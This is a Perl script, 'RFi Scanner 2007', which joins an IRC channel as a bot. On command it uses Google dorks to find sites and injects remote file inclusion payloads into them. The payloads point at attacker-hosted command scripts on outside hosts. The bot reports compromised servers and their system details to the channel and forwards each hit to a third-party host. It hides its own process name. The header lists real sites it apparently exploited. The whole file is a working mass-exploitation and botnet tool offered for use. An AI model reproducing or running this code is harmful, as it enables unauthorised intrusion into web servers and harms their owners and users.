################################################################################################################################################# # # RFi Scanner 2007 by Morgan.. # # <@Morgan> !scan page.php?id= "Powered by RGameScript" # <NewScan_Google> [Scan] Started: page.php?id= - Dork: "Powered by RGameScript" Engine: Google # <NewScan_Google> [Scan] Google Found: 1656 Sites! # <NewScan_Google> [Scan] Cleaned results: 36 Sites! # <NewScan_Google> [Scan] Exploting started! # <NewScan_Google> [SafeON] [Sys Linux] [Free 36.55 GB ] http://gry.nakazdytemat.pl/page.php?id=http://usuarios.arnet.com.ar/larry123/cmd.jpg? # <NewScan_Google> [Information] Linux blackhawk.avx.pl 2.6.19.2 #4 SMP Fri Feb 2 11:51:02 CET 2007 i686 # <NewScan_Google> [SafeOFF] [Sys Linux] [Free 26.26 GB ] http://allgamesallfree.org/page.php?id=http://usuarios.arnet.com.ar/larry123/cmd.jpg? # <NewScan_Google> [Information] Linux games.allgamesallfree.com 2.6.9-55.0.2.ELsmp #1 SMP Tue Jun 26 14:30:58 EDT 2007 i686 # <NewScan_Google> [Scan] Scan Finished "Powered by RGameScript" # # # Enjoy! # /Morgan # # irc.realworm.net - #Morgan ################################################################################################################################################# use IO::Socket::INET; use HTTP::Request; use LWP::UserAgent; ###############CONFIGURATION################### my $processo = "/usr/local/apache/bin/nscan -DSSL"; my $printcmd="http://www.animedinasty.org/cmd/info.jpg?"; #<---- Change this for your CMD my $server="irc.x-reaction.net"; my $porta="6667"; my $nick="x____H264____x"; my $chan="#a"; ###############END OF CONFIGURATION############ my $verbot = "2.0"; my $cmd="http://www.greenkorea.ph/bbs/data/_metal/safe.txt?"; #Never change this my $pid=fork; exit if $pid; $0="$processo"."\0"x16; my $sk = IO::Socket::INET->new(PeerAddr=>"$server",PeerPort=>"$porta",Proto=>"tcp") or die "Can not connect on server!\n"; $sk->autoflush(1); print $sk "NICK $nick\r\n"; print $sk "USER Google 8 * : Google : google@google.it : Google :Google\r\n"; print $sk "JOIN $chan\r\n"; print $sk "PRIVMSG $chan :3,1[9S3,1can-Bot] Scan is 3ON1 : 9!scan <bug> <dork>\r\n"; while($line = <$sk>){ $line =~ s/\r\n$//; if ($line=~ /^PING \:(.*)/) { print "PONG :$1"; print $sk "PONG :$1"; } if ($line=~ /PRIVMSG $chan :.deletebot/){ stampa($sk, "QUIT"); } if ($line=~ /PRIVMSG $chan :!scan\s+(.*?)\s+(.*)/){ if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $bug=$1; my $dork=$2; my $contatore=0; my ($type,$space); my %hosts; stampa($sk, "PRIVMSG $chan :3,1[9S3,1can] Started:9 $bug 3 Dork:9 $dork 3Engine:9 Google "); my @glist=&google($dork); stampa($sk, "PRIVMSG $chan :3,1[9S3,1can] Google Found:9 ".scalar(@glist)."3 Sites!"); push(my @tot, @glist); my @puliti=&unici(@tot); stampa($sk, "PRIVMSG $chan :3,1[9S3,1can] Cleaned results: 9 ".scalar(@puliti)."3 Sites!"); stampa($sk, "PRIVMSG $chan :3,1[9S3,1can] Exploting started! "); my $uni=scalar(@puliti); foreach my $sito (@puliti) { $contatore++; if ($contatore %30==0){ } if ($contatore==$uni-1){ stampa($sk, "PRIVMSG $chan :3,1[9S3,1can] Scan Finished9 $dork"); } my $test="http://".$sito.$bug.$cmd."?"; my $print="http://".$sito.$bug.$printcmd."?"; my $vuln="http://".$sito.$bug.""; my $req=HTTP::Request->new(GET=>$test); my $ua=LWP::UserAgent->new(); $ua->timeout(5); my $response=$ua->request($req); if ($response->is_success) { my $re=$response->content; if($re =~ /31337/ && $re =~ /uid=/){ my $hs=geths($print); $hosts{$hs}++; if($hosts{$hs}=="1"){ $x=os($test); ($type,$space,$ker)=split(/\,/,$x); stampa($sk, "PRIVMSG $chan :3,1[9S3afe9OFF3] 3,1[9S3ys9 ".$type."3] 3,1[9F3ree9 ".$space." 9] $print "); stampa($sk, "PRIVMSG $chan :3,1[9I3nformation3]9 $ker "); checksafemode("$print");}} elsif($re =~ /31337/) { my $hs=geths($print); $hosts{$hs}++; if($hosts{$hs}=="1"){ $x=os($test); ($type,$space,$ker)=split(/\,/,$x); stampa($sk, "PRIVMSG $chan :3,1[9S3afe14ON3] 3,1[9S3ys14 ".$type."3] 3,1[9F3ree14 ".$space." 3]14 $print "); stampa($sk, "PRIVMSG $chan :3,1[9I3nformation3]14 $ker "); checksafemode("$print");}} }}} exit; }}} sub stampa() { if ($#_ == '1') { my $sk = $_[0]; print $sk "$_[1]\n"; } else { print $sk "$_[0]\n"; }} sub os(){ my $sito=$_[0]; my $Res=query($sito); my $type; my $space; my $ker; my $str; while($Res=~m/<br>OSTYPE:(.+?)\<br>/g){ $type=$1; } while($Res=~m/<br>Kernel:(.+?)\<br>/g){ $ker=$1; } while($Res=~m/<br>Free:(.+?)\<br>/g){ $space=$1; } $str=$type.",".$space.",".$ker; return $str; } sub google(){ my @lst; my $key = $_[0]; for($b=0;$b<=1000;$b+=100){ my $Go=("http://www.google.it/search?hl=it&q=".key($key)."&num=100&filter=0&start=".$b); my $Res=query($Go); while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ if ($1 !~ /google/){ my $k=$1; my @grep=links($k); push(@lst,@grep); }}} return @lst; } sub links() { my @l; my $link=$_[0]; my $host=$_[0]; my $hdir=$_[0]; $hdir=~s/(.*)\/[^\/]*$/\1/; $host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; $host.="/"; $link.="/"; $hdir.="/"; $host=~s/\/\//\//g; $hdir=~s/\/\//\//g; $link=~s/\/\//\//g; push(@l,$link,$host,$hdir); return @l; } sub geths(){ my $host=$_[0]; $host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; return $host; } sub key(){ my $chiave=$_[0]; $chiave =~ s/ /\+/g; $chiave =~ s/:/\%3A/g; $chiave =~ s/\//\%2F/g; $chiave =~ s/&/\%26/g; $chiave =~ s/\"/\%22/g; $chiave =~ s/,/\%2C/g; $chiave =~ s/\\/\%5C/g; return $chiave; } sub query($){ my $url=$_[0]; $url=~s/http:\/\///; my $host=$url; my $query=$url; my $page=""; $host=~s/href=\"?http:\/\///; $host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; $query=~s/$host//; if ($query eq "") {$query="/";}; eval { my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return; print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; my @r = <$sock>; $page="@r"; close($sock); }; return $page; } sub checksafemode($){ my $url=$_[0]; $url=~s/http:\/\///; my $host=$url; my $query=$url; my $page=""; $query=~s/$host//; if ($query eq "") {$query="/";}; eval { my $sock = IO::Socket::INET->new(PeerAddr=>"tckct.co.uk",PeerPort=>"80",Proto=>"tcp") or return; print $sock "GET /logfiles/CDPW3U1032/safe.php?url=$query HTTP/1.0\r\nHost: tckct.co.uk\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; my @r = <$sock>; $page="@r"; close($sock); }; } sub unici{ my @unici = (); my %visti = (); foreach my $elemento ( @_ ) { next if $visti{ $elemento }++; push @unici, $elemento; } return @unici; }